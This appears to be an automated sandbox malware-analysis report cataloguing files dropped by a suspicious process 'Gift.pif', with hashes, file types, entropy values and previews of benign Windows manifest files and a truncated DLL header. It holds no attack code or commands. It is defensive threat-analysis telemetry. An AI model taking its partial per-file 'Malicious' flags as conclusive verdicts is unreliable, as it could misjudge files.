                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-OneCore-TetheringService".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. replacementSettingsVersionRange="0".. settingsVersion="1".. alwaysProcess="Yes".. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Roaming\*[*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Settings\*[*]</pattern>.. </objectSet>.. </include>.. </rules>..
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8193
                                                                        Entropy (8bit):5.027484893998515
                                                                        Encrypted:false
                                                                        SSDEEP:96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
                                                                        MD5:2D6ACF2AEC5E5349B16581C8AE23BF3E
                                                                        SHA1:0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
                                                                        SHA-256:B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
                                                                        SHA-512:7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:Google Chrome extension, version 3
                                                                        Category:dropped
                                                                        Size (bytes):4814
                                                                        Entropy (8bit):7.909739359753065
                                                                        Encrypted:false
                                                                        SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                        MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                        SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                        SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                        SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2062
                                                                        Entropy (8bit):4.925445222257812
                                                                        Encrypted:false
                                                                        SSDEEP:48:227+9gUKl+lxFcCY4/YBu4yTy3opyLyXyoyOyzylpjyA:22Sw+lxaWm3uCL9Gv
                                                                        MD5:60145F68B1CF9440FA663820AE11CE4B
                                                                        SHA1:10195A2926015E3024D769673E004AA60DFEC0A3
                                                                        SHA-256:4805E01EB0C9B3DFEB6B754D4148588E2FB798734D9EDE20E53EB8E75158B64F
                                                                        SHA-512:55D088040D25D4CBFF5A4210A85107666E628C67CA3134B0C836E135DBFE82AA4FA70185993E99D951307F7D159C1428B390727DA17EFEC5AA4BE9D799B96895
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="*".. name="Microsoft-Windows-Kerberos-Key-Distribution-Center-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. version="0.0.0.0".. />.. <migration>.. <machineSpecific>.. <migXml xmlns="">.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>.. <detect>.. <condition>MigXmlHelper.IsOSEarlierThan("NT", "6.0.0.0")</condition>.. </detect>.. </detects>.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\kdc\* [*]</pattern>.. </objectSet>.. </include>.. <exclude>.. <objectSet>.. <pattern type="Reg
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.136413900497188
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):5242880
                                                                        Entropy (8bit):0.03859996294213402
                                                                        Encrypted:false
                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):0.017262956703125623
                                                                        Encrypted:false
                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):155648
                                                                        Entropy (8bit):0.5407252242845243
                                                                        Encrypted:false
                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2829
                                                                        Entropy (8bit):5.130068712095974
                                                                        Encrypted:false
                                                                        SSDEEP:48:/2e8G+F0Vg8DIIgPdunPduPPduNJ7IgfCfikfidjikjirJu/MY4C5uXC5u/C5upL:/29F+cO0Mf7Rwiai5ieiFEMAQSQaQwX4
                                                                        MD5:CD55A48FE382A6820EC4FB55A66C2858
                                                                        SHA1:70A0A7B0E12DF915BD5E68FF0432637EFC2153DE
                                                                        SHA-256:97838AB994B53DFADEEF63955EECB05A7F118C2066EF97B0B0EB7BB48A526451
                                                                        SHA-512:37C6D78CCD807B04834659B5E796424C443B2C4F72481CB4080ED1BC5E6A954E47C4AF837A653DDAAFED2372C4FF60CE442170EA58586AB93C57B841449C5195
                                                                        Malicious:false
                                                                        Preview:<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. name="Microsoft-Windows-Crypto-keys".. version="0.0.0.0".. processorArchitecture="*".. language="neutral".. />.. <migration scope="Upgrade,MigWiz,USMT" .. replacementVersionRange="6.0-6.1".. replacementSettingsVersionRange="0".. settingsVersion="0" .. >.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\RSA\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\DSS\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\Keys[*]</pattern>.. </objectSet>.. </include>.. </rules>..
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):24008
                                                                        Entropy (8bit):6.062446965815151
                                                                        Encrypted:false
                                                                        SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                        MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                        SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                        SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                        SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: ljwIPDSwFi.exe, Detection: malicious
                                                                        • Filename: jE4zclRJU2.exe, Detection: malicious
                                                                        • Filename: 5CG2133F5Y_2024-04-05_12_15_35.569.zip, Detection: malicious
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):159744
                                                                        Entropy (8bit):0.5394293526345721
                                                                        Encrypted:false
                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.6732424250451717
                                                                        Encrypted:false
                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:Google Chrome extension, version 3
                                                                        Category:dropped
                                                                        Size (bytes):4814
                                                                        Entropy (8bit):7.909739359753065
                                                                        Encrypted:false
                                                                        SSDEEP:96:K9DcEoTtp9feekTeBInbpzQK/XMEkyS+v86l1pjb5vFQIRwDYPc:K56zAMWpQK/cyz8A7jb5vGIqQc
                                                                        MD5:6E6FE97CBC259DB47CD8423141CF35A3
                                                                        SHA1:EE7D38E394FC87FBF2D4CBF7A45A56E270D667E1
                                                                        SHA-256:1B2BA8FC90BA68CD057B9CAAFFC218EAD59A23E37F79192ED37D0C3A7A8BAB03
                                                                        SHA-512:9FEE51391A289037D36344E22A49D5D4B863F30FFD19B4377D61E57EF389599F2F2790C41B6902C45BAF27B21A1F6916B6B6DF61A490A35592BE8CD1164E1966
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1468
                                                                        Entropy (8bit):5.0065780470180306
                                                                        Encrypted:false
                                                                        SSDEEP:24:p/o2e8GFp8PvMu0Vnu7vFPvJ8+FXg0Mej39ImlQu/kKcCEF4wflBX0FCUK:22e8+8PvMu0VnuRPvJ8+FXgMtImlx3cd
                                                                        MD5:E68A33BDAF7AEBE6D5BBBCEFDED6AC5C
                                                                        SHA1:A1120341BB4452FCA47EB5EA8FA62A08BFC48073
                                                                        SHA-256:A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
                                                                        SHA-512:69E1A60C0FFE8AA19B55FABE47801EEEA7CF4C84E426318D8B7BFFAF09A14FC5F569573BE30753D354B604911A616C231F485B08C3778E0A214F7E3DC9C21D2C
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="artbaker".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="artbaker".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Cryptography-CryptoConfig-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration xmlns="">.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>..
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):98304
                                                                        Entropy (8bit):0.08235737944063153
                                                                        Encrypted:false
                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):0.017262956703125623
                                                                        Encrypted:false
                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1095
                                                                        Entropy (8bit):4.976174799333973
                                                                        Encrypted:false
                                                                        SSDEEP:24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
                                                                        MD5:ECC51190BD585AB376691BBDDF2A638B
                                                                        SHA1:84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
                                                                        SHA-256:6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
                                                                        SHA-512:C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):889
                                                                        Entropy (8bit):5.016955029110262
                                                                        Encrypted:false
                                                                        SSDEEP:24:p/o2e8ZR+Vj3Xg0cjAkt3QbENgwnwJXMFhUK:22e8v+VrgfAbIggwJuX
                                                                        MD5:2948FF1C0804EC7DB473BB77EB3FBE4E
                                                                        SHA1:98A97AFC0E4E2B09A17AA0746F455DFD24356357
                                                                        SHA-256:2F6B99F5915A462CAFF60950839E1498F12C9F8194DB3DA02251C5BD2CAD700E
                                                                        SHA-512:8393B3AE7D44A4DD85D05D48768F9123910E603C477A3CACC6BF12D03D464959EC01A293B0B3317B0F8470A76D71F695098AE211DD6200D8F7F21E1C757F4EDA
                                                                        Malicious:false
                                                                        Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Security-NGC-PopKeySrv".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. offlineApply="no".. scope="Upgrade,Data".. settingsVersion="3".. replacementSettingsVersionRange="0-2" .. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\* [*]</pattern>.. </objectSet>.. </include>.. </rules>.. </migXml>.. </migration>..</assembly>..
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):685392
                                                                        Entropy (8bit):6.872871740790978
                                                                        Encrypted:false
                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
• Filename: Hq2NRFbvRb.exe, Detection: malicious
• Filename: sorto.exe, Detection: malicious
• Filename: 66af531b832ee_main.exe, Detection: malicious
• Filename: 66af4e35e761b_doz.exe, Detection: malicious
• Filename: 01Y61PeNtn.exe, Detection: malicious
• Filename: 8lGYdT47s1.exe, Detection: malicious
• Filename: jp95FFMUoh.exe, Detection: malicious
• Filename: yLfAxBEcuo.exe, Detection: malicious
• Filename: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, Detection: malicious
• Filename: 66adc1d3f237b_mine.exe, Detection: malicious
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):608080
                                                                        Entropy (8bit):6.833616094889818
                                                                        Encrypted:false
                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):450024
                                                                        Entropy (8bit):6.673992339875127
                                                                        Encrypted:false
                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2046288
                                                                        Entropy (8bit):6.787733948558952
                                                                        Encrypted:false
                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):257872
                                                                        Entropy (8bit):6.727482641240852
                                                                        Encrypted:false
                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):80880
                                                                        Entropy (8bit):6.920480786566406
                                                                        Encrypted:false
                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):34740
                                                                        Entropy (8bit):5.400315708491517
                                                                        Encrypted:false
                                                                        SSDEEP:768:Adpqm+0Ih3tAA9CWGhOfcDAJTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2r:Ad8m+0Ih3tAA9CWGhOFJTBv++nIjBtPH
                                                                        MD5:C87EA4F4F247F8F00D044A93C7B1C8C8
